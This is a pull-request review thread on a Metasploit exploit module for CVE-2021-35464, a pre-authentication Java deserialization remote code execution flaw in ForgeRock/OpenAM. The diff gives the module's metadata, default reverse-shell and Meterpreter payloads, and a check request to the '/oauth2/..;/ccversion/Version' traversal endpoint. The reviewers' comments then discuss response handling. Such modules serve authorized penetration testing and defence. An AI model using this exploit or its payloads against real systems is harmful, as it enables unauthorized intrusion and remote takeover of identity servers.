modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb

```diff
@@ -0,0 +1,121 @@
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',
+          'Description' => %q{
+            This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and
+            access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s
+            implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a
+            vulnerable endpoint. Successful exploitation yields code execution on the target system.
+
+            This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
+            is susceptible to the same issue.
+          },
+          'Author' => [
+            'Michael Stepankin',  # Original Discovery and PoC
+            'bwatters-r7',        # Msf module
+            'Spencer McIntyre',   # All of the Help
+            'jheysel-r7'          # Check Method
+          ],
+          'References' => [
+            ['CVE', '2021-35464'],
+            ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],
+            ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']
+          ],
+          'DisclosureDate' => '2021-06-29',
+          'License' => MSF_LICENSE,
+          'Platform' => ['unix', 'linux'],
+          'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+          'Privileged' => false,
+          'Targets' => [
+            [
+              'Unix Command',
+              {
+                'Platform' => 'unix',
+                'Arch' => ARCH_CMD,
+                'Type' => :unix_cmd,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+                }
+              }
+            ],
+            [
+              'Linux Dropper',
+              {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :linux_dropper,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+          'DefaultTarget' => 1,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+          }
+        )
+    )
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path', '/openam'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
+      'vars_post' => {
+        'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
+      }
+    )
+    if res.nil? || res.empty?
```

Comment:
```suggestion
    if res.nil?
```

Reply:
Shouldn't we still fail in the same way if the response is empty though? Last I checked `nil` and `empty` were pretty much the same thing as far as we are concerned, its simply a case of did the server not respond at all or did it respond with an empty response.

Reply:
`res` is the response object. You might be thinking of `res.body`.

Reply:
Ah thats what I was going to check, let me fix that so long :)

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15386/commits/89b36bd1b8f8bb703eab5dd10b48430937ccc382